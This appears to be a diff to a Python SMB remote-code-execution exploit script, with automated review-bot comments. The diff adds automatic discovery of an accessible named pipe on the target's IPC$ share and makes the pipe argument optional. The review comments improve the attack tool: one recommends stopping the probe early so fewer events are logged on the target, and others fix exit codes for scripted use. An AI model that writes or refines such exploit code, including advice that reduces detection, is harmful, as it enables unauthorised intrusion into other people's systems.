find named pipe if it is omitted
@@ -269,6 +269,22 @@ def wait_for_request_processed(conn):
|
||||
# send echo is faster than sleep(0.05) when connection is very good
|
||||
conn.send_echo('a')
|
||||
|
||||
def find_named_pipe(conn):
|
||||
pipes = [ 'browser', 'spoolss', 'netlogon', 'lsarpc', 'samr' ]
|
||||
|
||||
tid = conn.tree_connect_andx('\\\\'+conn.get_remote_host()+'\\'+'IPC$')
|
||||
found_pipe = None
|
||||
for pipe in pipes:
|
||||
try:
|
||||
fid = conn.nt_create_andx(tid, pipe)
|
||||
conn.close(tid, fid)
|
||||
found_pipe = pipe
|
||||
except smb.SessionError, e:
|
||||
pass
|
||||
|
||||
conn.disconnect_tree(tid)
|
||||
return found_pipe
|
||||
|
||||
|
||||
special_mid = 0
|
||||
extra_last_mid = 0
|
||||
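Review bot: The probe loop in find_named_pipe does not stop at the first success, so every name in `pipes` is opened against the target and `found_pipe` ends up being the last accessible pipe rather than the first in list order; add `break` directly after `found_pipe = pipe` so the function returns as soon as one pipe opens and the remaining nt_create_andx calls, each another event on the target, are skipped. `conn.disconnect_tree(tid)` only runs if nothing other than smb.SessionError escapes the loop; putting the loop in a `try:` with `finally: conn.disconnect_tree(tid)` keeps the IPC$ tree from being left connected on an unexpected error. The caught exception `e` is never used, so either drop the name or emit it in a debug message so an operator can tell a closed pipe from a failed session.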
@@ -769,6 +785,13 @@ def exploit(target, pipe_name):
|
||||
print('This exploit does not support this target')
|
||||
sys.exit()
|
||||
|
||||
if pipe_name is None:
|
||||
pipe_name = find_named_pipe(conn)
|
||||
if pipe_name is None:
|
||||
print('Not found accessible named pipe')
|
||||
return False
|
||||
print('Using named pipe: '+pipe_name)
|
||||
|
||||
if not info['method'](conn, pipe_name, info):
|
||||
return False
|
||||
|
||||
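Review bot: A pipe_name passed in explicitly is used as-is, while only the auto-discovered one has been confirmed accessible by find_named_pipe, so a mistyped or unreachable pipe is not reported here but only fails later inside `info['method']`; at minimum document this with a comment above the `if pipe_name is None:` block, e.g. `# an explicit pipe_name is not probed; only the auto-discovered one is known to be accessible`, or run the same open/close probe on the supplied name. The new `return False` when no pipe is found leaves `conn` as it was; exploit begins and ends outside this hunk, so if the connection is torn down elsewhere on the False path this is fine, otherwise the early return should close the session it opened.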
@@ -921,12 +944,12 @@ def service_exec(conn, cmd):
|
||||
rpcsvc.disconnect()
|
||||
|
||||
|
||||
if len(sys.argv) != 3:
|
||||
print("{} <ip> <pipe_name>".format(sys.argv[0]))
|
||||
if len(sys.argv) < 2:
|
||||
print("{} <ip> [pipe_name]".format(sys.argv[0]))
|
||||
sys.exit(1)
|
||||
|
||||
target = sys.argv[1]
|
||||
pipe_name = sys.argv[2]
|
||||
pipe_name = None if len(sys.argv) < 3 else sys.argv[2]
|
||||
|
||||
exploit(target, pipe_name)
|
||||
print('Done')
|
||||
|
||||
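Review bot: The return value of `exploit(target, pipe_name)` is still discarded and 'Done' is printed with exit status 0, so the new "Not found accessible named pipe" path, which returns False, is indistinguishable from success for anyone scripting this; change the call to `if not exploit(target, pipe_name): sys.exit(1)` before the final print. The `rpcsvc.disconnect()` context line at the top belongs to service_exec, whose body starts outside the hunk.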